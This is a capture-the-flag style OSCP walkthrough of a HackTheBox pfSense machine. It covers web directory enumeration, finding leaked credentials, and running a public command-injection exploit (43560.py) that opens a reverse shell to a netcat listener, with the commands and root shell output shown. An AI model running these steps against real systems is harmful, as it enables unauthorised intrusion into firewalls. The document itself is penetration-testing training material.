Follow along in my OSCP journey, this is my target 4 of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to t follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.60I thought I might show what the output looks like for this machine in the scan/ folder
-rw-r--r-- 1 kali kali 4076 Jun 24 19:40 _commands.log
-rw-r--r-- 1 kali kali 586 Jun 24 19:40 _errors.log
-rw-r--r-- 1 kali kali 5483 Jun 24 19:42 _full_tcp_nmap.txt
-rw-r--r-- 1 kali kali 8092 Jun 24 19:40 _manual_commands.txt
-rw-r--r-- 1 kali kali 318 Jun 24 19:41 _patterns.log
-rw-r--r-- 1 kali kali 3349 Jun 24 19:40 _quick_tcp_nmap.txt
-rw-r--r-- 1 kali kali 10256 Jun 24 19:41 tcp_443_http_nmap.txt
-rw-r--r-- 1 kali kali 912 Jun 24 19:52 tcp_443_gobuster.txt
-rw-r--r-- 1 kali kali 7225 Jun 24 19:40 tcp_443_https_index.html
-rw-r--r-- 1 kali kali 1795 Jun 24 20:10 tcp_443_https_nikto.txt
-rw-r--r-- 1 kali kali 479 Jun 24 19:40 tcp_443_https_robots.txt
-rw-r--r-- 1 kali kali 3713863 Jun 24 19:40 tcp_443_https_shot.png
-rw-r--r-- 1 kali kali 768 Jun 24 19:40 tcp_443_https_web.txt
-rw-r--r-- 1 kali kali 5896 Jun 24 19:40 tcp_443_sslscan.txt
-rw-r--r-- 1 kali kali 0 Jun 24 19:40 tcp_80_http_gobuster.txt
-rw-r--r-- 1 kali kali 147 Jun 24 19:40 tcp_80_http_index.html
-rw-r--r-- 1 kali kali 1127 Jun 24 19:55 tcp_80_http_nikto.txt
-rw-r--r-- 1 kali kali 3286 Jun 24 19:40 tcp_80_http_nmap.txt
-rw-r--r-- 1 kali kali 157 Jun 24 19:40 tcp_80_http_robots.txt
-rw-r--r-- 1 kali kali 3713863 Jun 24 19:40 tcp_80_http_shot.png
-rw-r--r-- 1 kali kali 1652 Jun 24 19:40 tcp_80_http_whatweb.txt
-rw-r--r-- 1 kali kali 2278 Jun 24 19:49 _top_20_udp_nmap.txt-rw-So you get nmap specific scripts at the bottom and then service specific scripts above. You can obviously refine the tool or use your own tools afterwards but it usually gives a really nice picture.
Nmap
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 lighttpd 1.4.35
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open ssl/https? syn-ack ttl 63We got a Web server, the http version seems to redirect to the https but nothing more from that scan. Let’s explore them.
Web Server —80/443
Let’s check the web application
HINT
What are the main ideas to explore with this type of page?
.
.
.
.
The main ideas to test out with this type of situations:
- default credentials
- brute force
- SQL injection
In this case, Pfsense probably isn’t a good target for bruteforce and SQLi because we would get banned. Let’s try to find the default credentials.
But that didn’t work.
We’ll need to find another path or find away to bypass bruteforce restrictions…
What else did our scan bring back for us?
Gobuster
We notice one thing directly in this, a lot of these files seem to have to same size as the index file. Probably not returning anything… But we do have some interesting files.
/changelog.txt (Status: 200) [Size: 271]
/classes (Status: 301) [Size: 0]
/css (Status: 301) [Size: 0]
/edit.php (Status: 200) [Size: 6689]
/exec.php (Status: 200) [Size: 6689]
/favicon.ico (Status: 200) [Size: 1406]
/graph.php (Status: 200) [Size: 6690]
/help.php (Status: 200) [Size: 6689]
/includes (Status: 301) [Size: 0]
/index.html (Status: 200) [Size: 329]
/index.php (Status: 200) [Size: 6690]
/index.html (Status: 200) [Size: 329]
/index.php (Status: 200) [Size: 6690]
/installer (Status: 301) [Size: 0]
/javascript (Status: 301) [Size: 0]
/license.php (Status: 200) [Size: 6692]
/pkg.php (Status: 200) [Size: 6688]
/stats.php (Status: 200) [Size: 6690]
/status.php (Status: 200) [Size: 6691]
/system.php (Status: 200) [Size: 6691]
/themes (Status: 301) [Size: 0]
/tree (Status: 301) [Size: 0]
/widgets (Status: 301) [Size: 0]
/xmlrpc.php (Status: 200) [Size: 384]
/xmlrpc.php (Status: 200) [Size: 384]Getting User and Root
changelog.txt
This doesn’t give up too much other than, there is a clear vulnerability that hasn’t been patched. Let’s look for pfsense exploits.
(Authenticated)pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection | exploits/php/webapps/47413.py
(Authenticated) pfSense - Group Member Remote Com | exploits/unix/remote/43193.rb
(Authenticated) pfSense 2.1 build 20130911-1816 - Directory Trave | exploits/php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabilities | exploits/php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversal | exploits/php/webapps/39038.txt
pfSense 2.3.1_1 - Command Execution | exploits/php/webapps/43128.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Comm | exploits/php/webapps/43560.py
pfSense Community Edition 2.2.6 - Multiple Vulner | exploits/php/webapps/39709.txtAfter removing all the cross-site scripting options we are left with 2 non-metasploit scripts that we can try straight away but it seems in all cases we’ll need to be authenticated for this to work.
Let’s continue to explore
Tree
It seems that this is actually SilverStripe tree, a file tree control software… not really sure how we can exploit or take advantage of it.
Let’s see if we can find any related exploits
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 3.6.2 - CSV Excel Macro Injection
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File UploadAt first it seems we might have found something, but these are really just related to the CMS from SilverStripe. And during our research to understand better the purpose of this software regarding pfsense we stumbled upon this
It seems that this exposed tree is completely fine and empty of anything exploitable.
HINT
What are we missing? is there a step in our enumeration that could be improved?
.
.
.
.
Our directory busting on;y tested the default gobuster wordlist, let’s try again with a larger list!
Let’s take this opportunity and play with different directory busters
feroxbuster --url http://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -e -s 200-w wordlist
-x extensions
-e extract links and make new requests based on findings
-s only display responses witha particular status code/
Because we know that in the previous directory busting we had a lot of redirects, only looking for 200 filters all the 301s.
kali@kali:/opt/fuff$ ./ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60 /FUZZ -e ".txt,.php,.html"-w wordlist
-u url
-e extensions
Did you spot the new item that looks very interesting?
Let’s check system-users.txt!
We got the credentials, now it’s your turn to play!
HINT
Let’s get inside and let’s try those exploits!
.
.
.
.
It seems that the password isn’t “company defaults” but pfsense of course, this makes sense if you remember the default pfsense credentials, shown early!
We get the version of the pfsense running, now it’s easy-peasy to select the correct exploit out of the list.
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | exploits/php/webapps/43560.pyWe can rapidly copy in our directory the exploit using this command
kali@kali:~/Documents/HTB/lab$ searchsploit -m exploits/php/webapps/43560.pyLet’s check the script to understand how to use it.
fSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Ensure you have started a listener to catch the shell before running!
'''parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument("--username", help = "pfsense Username")
parser.add_argument("--password", help = "pfsense Password")
Let’s follow instructions, we start with the listener
kali@kali:~/Documents/HTB/lab$ nc -nlvp 5555
listening on [any] 5555 ...We can now run the exploit!
kali@kali:~/Documents/HTB/lab/10.10.10.60/exploit$ python3 43560.py --username rohit --password pfsense --lhost attacking_ip --lport 5555 --rhost 10.10.10.60
CSRF token obtained Running exploit...
Exploit completed
kali@kali:~/Documents/HTB/lab/10.10.10.60/exploit$We go back to the listener… GG LET’S GOOOO, instant root!!
kali@kali:~/Documents/HTB/lab$ nc -nlvp 5555
listening on [any] 5555 ...
0connect to [10.10.14.46] from (UNKNOWN) [10.10.10.60] 61450
sh: can't access tty; job control turned off
# id
0id: not found
# whoami
root
# pwd
/var/db/rrd
# cd /root/
# ls
.cshrc
.first_time
.gitsync_merge.sample
.hushlogin
.login
.part_mount
.profile
.shrc
.tcshrc
root.txt
# cat root.txt
----------------------------------
# ifconfig
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=9b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM>
ether 00:50:56:b9:29:80
inet 10.10.10.60 netmask 0xffffff00 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:2980%em0 prefixlen 64 scopeid 0x1
nd6 options=1<PERFORMNUD>
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
plip0: flags=8810<POINTOPOINT,SIMPLEX,MULTICAST> metric 0 mtu 1500
enc0: flags=0<> metric 0 mtu 1536
pfsync0: flags=0<> metric 0 mtu 1460
syncpeer: 224.0.0.240 maxupd: 128 syncok: 1
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
options=3<RXCSUM,TXCSUM>
inet 127.0.0.1 netmask 0xff000000
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x5
nd6 options=3<PERFORMNUD,ACCEPT_RTADV>
pflog0: flags=100<PROMISC> metric 0 mtu 33144Let’s grab the root and user flag, but we don’t forget our kill picture with ifconfig as per OSCP exam regulations!
What did I learn?
- Explore things you have already done with different tools or wordlists. Fuzzing scenarios vary a lot and some tools will perform better in different situations
This was a more simple relaxed machine but without using the right wordlist you could really fall into rabbit holes. Make sure to be thorough with your enumeration and you’ll avoid losing time!
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.
